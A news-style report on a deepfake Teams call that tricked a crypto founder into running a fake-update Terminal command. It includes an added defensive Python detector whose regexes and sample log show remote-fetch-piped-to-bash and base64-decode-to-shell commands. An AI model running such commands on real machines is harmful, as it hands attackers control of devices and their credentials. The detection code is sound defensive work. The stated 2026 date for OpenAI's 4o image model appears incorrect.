Crypto Founder Duped by Deepfake Teams Call After Telegram Hack

Executive Summary

A crypto founder’s laptop was compromised after he answered a Microsoft Teams video call that appeared to come from Pierre Kaklamanos of the Cardano Foundation. The call featured a deep‑fake video and a counterfeit update prompt that instructed the victim to run a Terminal command, effectively handing the attacker control of the device. The intrusion leveraged a compromised Telegram account, a spoofed Zoom meeting, and a series of AI‑generated media, mirroring a pattern of fake‑update attacks Microsoft reported in February and March 2026 and a similar intrusion detailed by Google Cloud’s Mandiant unit.

What Happened

Earlier this week, a founder of a blockchain project received a Microsoft Teams invitation that seemed to originate from Pierre Kaklamanos, a known Cardano Foundation contact. The invitation included a video link that displayed a face and voice matching the founder’s memory of Kaklamanos, as well as two additional figures presented as Cardano Foundation members.

During the call, the attacker displayed a fake update dialog claiming that Teams was out of date. The prompt directed the victim to reinstall the app by copying a command into the macOS Terminal. Believing the request to be legitimate, the founder executed the command and then powered down the laptop.

After the call, the attacker kept up the ruse, replying in the impersonated persona to the founder’s suggestion to move the conversation to Google Meet. The entire chain of deception was built on a compromised Telegram account that the attacker used to schedule the meeting, a spoofed Zoom invitation that preceded the Teams call, and a deep‑fake video that convincingly mimicked the target executives.

Background / Context

Microsoft has recently warned of a surge in fake‑update campaigns that masquerade as workplace applications. In February and March 2026, the company documented malicious installers named “msteams.exe” and “zoomworkspace.clientsetup.exe” that prompted users to paste commands into Terminal, stealing browser passwords, crypto wallets, cloud credentials, and developer keys. These “ClickFix”‑style prompts specifically target macOS users and rely on social engineering to appear as routine software updates.

Google Cloud’s Mandiant unit reported a parallel intrusion aimed at a crypto organization. The report described the same multi‑step approach: a compromised Telegram account, spoofed meeting invites, a deep‑fake executive video, and malicious Terminal commands. Mandiant confirmed that the attackers employed AI tools to generate the video but could not verify which model was used.

On April 24, Pierre Kaklamanos posted on X that his Telegram account had been hacked and that an impersonator was using his identity to lure industry contacts. He warned peers to avoid clicking links or scheduling meetings through that compromised channel. The timing of his warning aligns closely with the founder’s breach, suggesting the attacker leveraged the same compromised account to initiate the fake Teams call.

OpenAI introduced its 4o image‑generation model on March 25, 2026, touting highly photorealistic outputs. While the model’s capabilities could facilitate convincing deep‑fakes, no forensic analysis has yet linked the attacker’s video to a specific AI system.

Reactions

The Cardano Foundation has not issued an official statement regarding the impersonation of its staff member, but the incident has sparked concern among blockchain projects that regularly interact with foundation representatives. Industry insiders are urging peers to verify meeting links through secondary channels and to treat unsolicited update prompts with heightened suspicion.

Microsoft reiterated its guidance on recognizing fake‑update prompts, emphasizing that legitimate Teams updates are delivered through the official app store or the company’s internal deployment system, never via a Terminal command entered by the user.
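As an added defensive illustration that is not from the article, Microsoft or Google, the following check turns that guidance into a detection: it flags commands run from an interactive terminal that fetch remote content and pipe it straight into a shell, or decode an obfuscated blob before executing it, which are the shapes a fake‑update prompt asks the user to paste. The log record format, the indicator regexes and the sample lines are all constructed for this example.

```python
"""Flag paste-to-Terminal ("ClickFix"-style) commands in process telemetry.
Added defensive example; the log format is constructed, map it onto your own
EDR or unified-log export before use."""
import re

# One constructed heuristic per behaviour a fake "update" prompt typically asks for.
INDICATORS = {
    "remote_fetch_to_shell": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z)?sh\b"),
    "base64_decode_to_shell": re.compile(r"base64\s+(-d|--decode|-D)[^|;&]*\|\s*(ba|z)?sh\b"),
}

# Constructed record shape: <timestamp> parent=<process name> cmd="<command line>"
LOG_RE = re.compile(r'^(?P<ts>\S+)\s+parent=(?P<parent>\S+)\s+cmd="(?P<cmd>.*)"$')
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}


def classify_command(cmd: str) -> list[str]:
    """Return the names of every indicator the command line matches."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def scan_events(lines: list[str]) -> list[dict]:
    """Alert on matching commands whose parent is an interactive terminal.

    A user pasting into Terminal.app is exactly the ClickFix path; the parent
    filter keeps scheduled jobs and installers that legitimately script curl out.
    """
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["parent"] not in INTERACTIVE_PARENTS:
            continue
        hits = classify_command(m["cmd"])
        if hits:
            alerts.append({"ts": m["ts"], "cmd": m["cmd"], "indicators": hits})
    return alerts


# Constructed sample telemetry (not real attack data); the last line is the same
# command from a non-interactive parent and is deliberately not alerted on.
SAMPLE_LOG = [
    '2026-04-24T10:02:11Z parent=Terminal cmd="git status"',
    '2026-04-24T10:05:40Z parent=Terminal cmd="curl -fsSL https://update.example.invalid/teams.sh | bash"',
    '2026-04-24T10:05:41Z parent=Terminal cmd="echo aGVsbG8= | base64 -d | sh"',
    '2026-04-24T10:06:02Z parent=launchd cmd="curl -fsSL https://example.invalid/x | bash"',
]

ALERTS = scan_events(SAMPLE_LOG)  # two alerts expected, one per indicator hit
```

The parent‑process filter is what keeps this rule usable: the same `curl | bash` string from a package manager or CI runner is routine, while the same string typed into Terminal after a video call is the event this article describes.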

Google Cloud’s security team highlighted the evolving threat landscape, noting that the combination of compromised messaging accounts and AI‑generated media represents a new frontier for social‑engineering attacks on high‑value crypto targets.

What It Means

The breach underscores the growing sophistication of phishing attacks that blend compromised communication channels with AI‑driven deep‑fakes. For crypto founders and developers, the episode serves as a reminder that trust relationships—especially those built on informal messaging platforms—can be weaponized when an attacker gains control of a single account.

Security teams are likely to prioritize hardening messaging tools, enforcing multi‑factor authentication on Telegram and similar services, and adding verification steps for meeting invites that involve high‑profile executives. The incident also highlights the need for organizations to educate staff on the dangers of executing unsolicited Terminal commands, even when presented within seemingly authentic UI dialogs.

Finally, the alignment of this attack with Microsoft’s documented fake‑update campaigns suggests that threat actors are adapting known malicious frameworks to target the crypto sector specifically, capitalizing on the high value of digital assets and the frequent use of remote collaboration tools.

What Happens Next

In the coming weeks, both Microsoft and Google Cloud are expected to release updated security advisories that detail detection signatures for the malicious installers and deep‑fake video patterns observed in this case. The Cardano Foundation is likely to issue guidance for its partners on how to authenticate communication requests and to audit any compromised accounts.

Crypto projects are expected to conduct internal reviews of their meeting scheduling practices, enforce stricter verification for executive contacts, and consider deploying AI‑driven detection tools that can flag synthetic media. As AI‑generated content becomes more accessible, industry watchdogs anticipate a rise in similar social‑engineering attempts, prompting a broader push for education and technical safeguards across the blockchain ecosystem.